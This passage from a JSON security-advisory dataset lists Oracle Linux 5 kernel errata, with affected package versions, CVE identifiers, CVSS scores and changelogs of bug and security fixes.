"Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.18-164.11.1.0.1.el5.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-164.11.1.0.1.el5-1.4.4-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-164.11.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "ia64", "packageFilename": "kernel-devel-2.6.18-164.11.1.0.1.el5.ia64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "i686", "packageFilename": "kernel-PAE-devel-2.6.18-164.11.1.0.1.el5.i686.rpm", "packageName": "kernel-PAE-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "i686", "packageFilename": "kernel-2.6.18-164.11.1.0.1.el5.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-2.6.18-164.11.1.0.1.el5.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "ia64", "packageFilename": "kernel-xen-devel-2.6.18-164.11.1.0.1.el5.ia64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-164.11.1.0.1.el5xen-2.0.5-1.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-164.11.1.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "ia64", "packageFilename": "kernel-headers-2.6.18-164.11.1.0.1.el5.ia64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "i386", "packageFilename": "kernel-headers-2.6.18-164.11.1.0.1.el5.i386.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "ia64", "packageFilename": "kernel-xen-2.6.18-164.11.1.0.1.el5.ia64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-headers-2.6.18-164.11.1.0.1.el5.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-164.11.1.0.1.el5-2.0.5-1.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-164.11.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-164.11.1.0.1.el5-1.4.4-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-164.11.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-164.11.1.0.1.el5PAE-1.4.4-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-164.11.1.0.1.el5PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "ia64", "packageFilename": "kernel-debug-2.6.18-164.11.1.0.1.el5.ia64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-164.11.1.0.1.el5debug-1.4.4-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-164.11.1.0.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-164.11.1.0.1.el5PAE-2.0.5-1.el5.i686.rpm", "packageName": "oracleasm-2.6.18-164.11.1.0.1.el5PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "i686", "packageFilename": "kernel-devel-2.6.18-164.11.1.0.1.el5.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-164.11.1.0.1.el5debug-1.4.4-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-164.11.1.0.1.el5debug", "operator": "lt"}], "description": "[2.6.18-164.11.1.0.1.el5]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- Add entropy support to igb ( John Sobecki) [orabug 7607479]\n- [nfs] convert ENETUNREACH to ENOTCONN [orabug 7689332]\n- [NET] Add xen pv/bonding netconsole support (Tina yang) [orabug 6993043]\n [bz 7258]\n- [MM] shrink zone patch (John Sobecki,Chris Mason) [orabug 6086839]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [nfsd] fix failure of file creation from hpux client (Wen gang Wang)\n [orabug 7579314]\n- FP register state is corrupted during the handling a SIGSEGV (Chuck Anderson)\n [orabug 7708133]\n[2.6.18-164.11.1.el5]\n- [firewire] ohci: handle receive packets with zero data (Jay Fenlason) [547241 547242] {CVE-2009-4138}\n- [x86] sanity check for AMD northbridges (Andrew Jones) [549905 547518]\n- [x86_64] disable vsyscall in kvm guests (Glauber Costa) [550968 542612]\n- [fs] ext3: replace lock_super with explicit resize lock (Eric Sandeen) [549908 525100]\n- [fs] respect flag in do_coredump (Danny Feng) [544188 544189] {CVE-2009-4036}\n- [gfs2] make O_APPEND behave as expected (Steven Whitehouse) [547521 544342]\n- [fs] hfs: fix a potential buffer overflow (Amerigo Wang) [540740 540741] {CVE-2009-4020}\n- [fuse] prevent fuse_put_request on invalid pointer (Danny Feng) [538736 538737] {CVE-2009-4021}\n- [mm] call vfs_check_frozen after unlocking the spinlock (Amerigo Wang) [548370 541956]\n- [infiniband] init neigh->dgid.raw on bonding events (Doug Ledford) [543448 538067]\n- [scsi] gdth: prevent negative offsets in ioctl (Amerigo Wang) [539420 539421] {CVE-2009-3080}\n- [fs] gfs2: fix glock ref count issues (Steven Whitehouse) [544978 539240]\n- [net] call cond_resched in rt_run_flush (Amerigo Wang) [547530 517588]\n- [scsi] megaraid: fix sas permissions in sysfs (Casey Dahlin) [537312 537313] {CVE-2009-3889 CVE-2009-3939}\n- [ia64] kdump: restore registers in the stack on init (Takao Indoh ) [542582 515753]\n- [x86] kvm: don't ask HV for tsc khz if not using kvmclock (Glauber Costa ) [537027 531268]\n- [net] sched: fix panic in bnx2_poll_work (John Feeney ) [539686 526481]\n- [x86_64] fix 32-bit process register leak (Amerigo Wang ) [526797 526798]\n- [cpufreq] add option to avoid smi while calibrating (Matthew Garrett ) [537343 513649]\n- [kvm] use upstream kvm_get_tsc_khz (Glauber Costa ) [540896 531025]\n- [net] fix unbalance rtnl locking in rt_secret_reschedule (Neil Horman ) [549907 510067]\n- [net] r8169: imporved rx length check errors (Neil Horman ) [552913 552438]\n- [scsi] lpfc: fix FC ports offlined during target controller faults (Rob Evers ) [549906 516541]\n- [net] emergency route cache flushing fixes (Thomas Graf ) [545662 545663] {CVE-2009-4272}\n- [fs] fasync: split 'fasync_helper()' into separate add/remove functions (Danny Feng ) [548656 548657] {CVE-2009-4141}\n- [scsi] qla2xxx: NPIV vport management pseudofiles are world writable (Tom Coughlan ) [537317 537318] {CVE-2009-3556}", "edition": 3, "reporter": "Oracle", "published": "2010-01-20T00:00:00", "title": "kernel security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-3556", "CVE-2009-3939", "CVE-2009-4272", "CVE-2009-2910", "CVE-2009-4141", "CVE-2009-3080", "CVE-2006-6304", "CVE-2009-4020", "CVE-2009-4036", "CVE-2009-3889", "CVE-2009-4021", "CVE-2009-4138"], "modified": "2010-01-20T00:00:00", "id": "ELSA-2010-0046", "href": "http://linux.oracle.com/errata/ELSA-2010-0046.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:43:58", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-194.el5-2.0.5-1.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-194.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-194.el5PAE-1.4.4-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-194.el5PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "i686", "packageFilename": "kernel-devel-2.6.18-194.el5.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "ia64", "packageFilename": "kernel-debug-2.6.18-194.el5.ia64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.18-194.el5.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-194.el5-1.4.4-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-194.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-194.el5xen-2.0.5-1.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-194.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "ia64", "packageFilename": "kernel-devel-2.6.18-194.el5.ia64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "x86_64", "packageFilename": "kernel-devel-2.6.18-194.el5.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-194.el5-1.4.4-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-194.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-194.el5-1.4.4-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-194.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-194.el5-1.4.4-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-194.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "ia64", "packageFilename": "kernel-xen-2.6.18-194.el5.ia64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "ia64", "packageFilename": "kernel-headers-2.6.18-194.el5.ia64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "x86_64", "packageFilename": "kernel-2.6.18-194.el5.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-194.el5debug-2.0.5-1.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-194.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-194.el5xen-1.4.4-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-194.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "src", "packageFilename": "kernel-2.6.18-194.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "src", "packageFilename": "kernel-2.6.18-194.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "src", "packageFilename": "kernel-2.6.18-194.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-194.el5debug-1.4.4-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-194.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-194.el5-2.0.5-1.el5.src.rpm", "packageName": "oracleasm-2.6.18-194.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-194.el5-2.0.5-1.el5.src.rpm", "packageName": "oracleasm-2.6.18-194.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-194.el5-2.0.5-1.el5.src.rpm", "packageName": "oracleasm-2.6.18-194.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "i686", "packageFilename": "kernel-xen-devel-2.6.18-194.el5.i686.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "i686", "packageFilename": "kernel-PAE-2.6.18-194.el5.i686.rpm", "packageName": "kernel-PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "ia64", "packageFilename": "kernel-debug-devel-2.6.18-194.el5.ia64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "i686", "packageFilename": "kernel-PAE-devel-2.6.18-194.el5.i686.rpm", "packageName": "kernel-PAE-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "i686", "packageFilename": "kernel-xen-2.6.18-194.el5.i686.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-194.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-194.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-194.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.18-194.el5.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-194.el5xen-1.4.4-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-194.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-194.el5-2.0.5-1.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-194.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-194.el5xen-2.0.5-1.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-194.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-194.el5xen-1.4.4-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-194.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-194.el5-1.4.4-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-194.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "i386", "packageFilename": "kernel-headers-2.6.18-194.el5.i386.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-194.el5-1.4.4-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-194.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "ia64", "packageFilename": "kernel-xen-devel-2.6.18-194.el5.ia64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "i686", "packageFilename": "kernel-debug-2.6.18-194.el5.i686.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-194.el5PAE-2.0.5-1.el5.i686.rpm", "packageName": "oracleasm-2.6.18-194.el5PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-194.el5debug-2.0.5-1.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-194.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "x86_64", "packageFilename": "kernel-xen-devel-2.6.18-194.el5.x86_64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-194.el5xen-2.0.5-1.el5.i686.rpm", "packageName": "oracleasm-2.6.18-194.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-194.el5debug-1.4.4-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-194.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-194.el5-2.0.5-1.el5.i686.rpm", "packageName": "oracleasm-2.6.18-194.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-194.el5debug-2.0.5-1.el5.i686.rpm", "packageName": "oracleasm-2.6.18-194.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "i686", "packageFilename": "kernel-2.6.18-194.el5.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "x86_64", "packageFilename": "kernel-xen-2.6.18-194.el5.x86_64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.18-194.el5.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "ia64", "packageFilename": "kernel-2.6.18-194.el5.ia64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-194.el5debug-1.4.4-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-194.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-194.el5", "arch": "x86_64", "packageFilename": "kernel-headers-2.6.18-194.el5.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}], "description": " [2.6.18-194.el5]\n- [net] mlx4: pass attributes down to vlan interfaces (Doug Ledford) [573098]\n- [block] cfq-iosched: fix sequential read perf regression (Jeff Moyer) [571818]\n[2.6.18-193.el5]\n- [fs] gfs2: locking fix for potential dos (Steven Whitehouse) [572390] {CVE-2010-0727}\n- [acpi] power_meter: avoid oops on driver load (Matthew Garrett) [566575]\n- [net] r8169: fix assignments in backported net_device_ops (Ivan Vecera) [568040]\n- [net] virtio_net: refill rx buffer on out-of-memory (Herbert Xu) [554078]\n[2.6.18-192.el5]\n- [cpu] fix amd l3 cache disable functionality (Jarod Wilson) [517586]\n- [misc] backport upstream strict_strto* functions (Jarod Wilson) [517586]\n- [wireless] rt2x00: fix work cancel race conditions (Stanislaw Gruszka) [562972]\n- [net] igb: fix DCA support for 82580 NICs (Stefan Assmann) [513712]\n- Revert: [ia64] kdump: fix a deadlock while redezvousing (Neil Horman) [506694]\n- [block] cfq: kick busy queues w/o waiting for merged req (Jeff Moyer) [570814]\n- [fs] cifs: max username len check in setup does not match (Jeff Layton) [562947]\n- [fs] cifs: CIFS shouldnt make mountpoints shrinkable (Jeff Layton) [562947]\n- [fs] cifs: fix dentry hash for case-insensitive mounts (Jeff Layton) [562947]\n- [fs] cifs: fix len for converted unicode readdir names (Jeff Layton) [562947]\n- [x86_64] xen: fix missing 32-bit syscalls on 64-bit Xen (Christopher Lalancette) [559410]\n- [fs] gfs2: fix kernel BUG when using fiemap (Abhijith Das) [569610]\n- [net] sctp: backport cleanups for ootb handling (Neil Horman) [555667] {CVE-2010-0008}\n- [xen] vtd: ignore unknown DMAR entries (Don Dugger) [563900]\n[2.6.18-191.el5]\n- [wireless] iwlwifi: fix dual band N-only use on 5x00 (Stanislaw Gruszka) [566696]\n- [net] be2net: critical bugfix from upstream (Ivan Vecera) [567718]\n- [net] tg3: fix 5717 and 57765 asic revs panic under load (John Feeney) [565964]\n- [net] bnx2x: use single tx queue (Stanislaw Gruszka) [567979]\n- [net] igb: fix WoL initialization when disabled in eeprom (Stefan Assmann) [564102]\n- [net] igb: fix warning in igb_ethtool.c (Stefan Assmann) [561076]\n- [net] s2io: restore ability to tx/rx vlan traffic (Neil Horman) [562732]\n- [net] ixgbe: stop unmapping DMA buffers too early (Andy Gospodarek) [568153]\n- [net] e1000e: disable NFS filtering capabilites in ICH hw (Andy Gospodarek) [558809]\n- [net] bnx2: update firmware and version to 2.0.8 (Andy Gospodarek) [561578]\n- [net] mlx4: fix broken SRIOV code (Doug Ledford) [567730]\n- [net] mlx4: pass eth attributes down to vlan interfaces (Doug Ledford) [557109]\n- [x86_64] fix missing 32 bit syscalls on 64 bit (Wade Mealing) [559410]\n- [s390] zcrypt: Do not remove coprocessor on error 8/72 (Hendrik Brueckner) [561067]\n- [misc] usb-serial: add support for Qualcomm modems (Pete Zaitcev) [523888]\n- [scsi] mpt2sas: fix missing initialization (Tomas Henzl) [565637]\n- [i386] mce: avoid deadlocks during MCE broadcasts (Prarit Bhargava) [562862]\n- [x86_64] k8: do not mark early_is_k8_nb as __init (Paolo Bonzini) [567275]\n- [ia64] kdump: fix a deadlock while redezvousing (Neil Horman) [506694]\n- [dm] raid45: constructor error path oops fix (Heinz Mauelshagen) [565494]\n- [mm] prevent severe performance degradation hang fix (Dave Anderson) [544448]\n- [net] cxgb3: memory barrier addition fixup (Steve Best) [561957]\n[2.6.18-190.el5]\n- [x86_64] mce: avoid deadlocks during MCE broadcasts (Prarit Bhargava) [562866]\n- [scsi] device_handler: add netapp to alua dev list (Mike Christie) [562080]\n- [misc] wacom: add Intuos4 support (Don Zickus) [502708]\n- [scsi] be2iscsi: fix eh bugs and enable new hw support (Mike Christie) [564145]\n- [net] ixgbe: initial support of ixgbe PF and VF drivers (Andy Gospodarek) [525577]\n- [fs] ext4: avoid divide by 0 when mounting corrupted fs (Eric Sandeen) [547253]\n- [net] bnx2x: update to 1.52.1-6 firmware (Stanislaw Gruszka) [560556]\n- [net] bnx2x: update to 1.52.1-6 (Stanislaw Gruszka) [560556]\n- [misc] hvc_iucv: alloc send/receive buffers in DMA zone (Hendrik Brueckner) [566202]\n- [net] ixgbe: prevent speculatively processing descriptors (Steve Best) [566309]\n- [fs] fix randasys crashes x86_64 systems regression (Peter Bogdanovic) [562857]\n- [scsi] fix bugs in fnic and libfc (Mike Christie) [565594]\n- [net] tg3: fix 57765 LED (John Feeney) [566016]\n- [net] tg3: fix race condition with 57765 devices (John Feeney) [565965]\n- [fs] gfs2: use correct GFP for alloc page on write (Steven Whitehouse) [566221]\n- [scsi] lpfc: update version for 8.2.0.63.3p release (Rob Evers) [564506]\n- [scsi] lpfc: fix driver build issues in rhel5.5 (Rob Evers) [564506]\n- [scsi] lpfc: relax event queue field checking (Rob Evers) [564506]\n- [scsi] lpfc: implement the PORT_CAPABITIES mailbox cmd (Rob Evers) [564506]\n- [scsi] lpfc: fix a merge issue (Rob Evers) [564506]\n- [scsi] lpfc: Add support for new SLI features (Rob Evers) [564506]\n- [scsi] lpfc: Add support for 64-bit PCI BAR region 0 (Rob Evers) [564506]\n- [nfs] fix a deadlock in the sunrpc code (Steve Dickson) [548846]\n- [fs] ecryptfs: fix metadata in xattr feature regression (Eric Sandeen) [553670]\n- [scsi] qla2xxx: return FAILED if abort command fails (Rob Evers) [559972]\n- [virtio] fix module loading for virtio-balloon module (Anthony Liguori) [564361]\n- [mm] xen: make mmap() with PROT_WRITE (Andrew Jones) [562761]\n- [hwmon] w83627hf: fix data to platform_device_add_data (Dean Nelson) [557172]\n- [hwmon] smsc47m1: fix data to platform_device_add_data (Dean Nelson) [560944]\n- [hwmon] it87: fix sio_data to platform_device_add_data (Dean Nelson) [559950]\n- [hwmon] f71805f: fix sio_data to platform_device_add_data (Dean Nelson) [564399]\n- [base] make platform_device_add_data accept const pointer (Dean Nelson) [557172 559950 560944 564399]\n- [net] forcedeth: fix putting system into S4 (Matthew Garrett) [513203]\n- [net] netfilter: allow changing queue length via netlink (Steve Best) [562945]\n- [mm] i386: fix iounmaps use of vm_structs size field (Danny Feng) [549465]\n- [ppc] fix sched while atomic error in alignment handler (Steve Best) [543637]\n- [pci] aer: disable advanced error reporting by default (Prarit Bhargava) [559978]\n- [s390] qeth: set default BLKT settings by OSA hw level (Hendrik Brueckner) [559621]\n- [net] e1000e: fix deadlock unloading module on some ICH8 (Andy Gospodarek) [555818]\n- [misc] rwsem: fix a bug in rwsem_is_locked() (Amerigo Wang) [526092]\n- [s390] clear high-order bits after switch to 64-bit mode (Hendrik Brueckner) [546302]\n[2.6.18-189.el5]\n- [net] wireless fixes from 2.6.32.7 (John Linville) [559711]\n- [net] wireless fixes from 2.6.32.4 (John Linville) [559711]\n- [net] wireless fixes through 2.6.32.3 (John Linville) [559711]\n- [net] wireless fixes from 2.6.32.2 (John Linville) [559711]\n[2.6.18-188.el5]\n- [net] be2net: latest bugfixes from upstream for rhel5.5 (Ivan Vecera) [561322]\n- [infiniband] fix bitmask handling from QP control block (Steve Best) [561953]\n- [infiniband] fix issue w/sleep in interrupt ehca handler (Steve Best) [561952]\n- [char] ipmi: fix ipmi_watchdog deadlock (Tony Camuso) [552675]\n- [net] cnic: additional fixes for rhel5.5 update (Mike Christie) [517378]\n- [net] cxgb3: add memory barriers (Steve Best) [561957]\n- [fs] nfsv4: distinguish expired from stale stateid (Wade Mealing) [514654]\n- [net] igb: fix msix_other interrupt masking (Stefan Assmann) [552348]\n- [net] niu: fix deadlock when using bonding (Andy Gospodarek) [547943]\n- [x86] xen: invalidate dom0 pages before starting guest (Christopher Lalancette) [466681]\n- [cpufreq] powernow-k8: fix crash 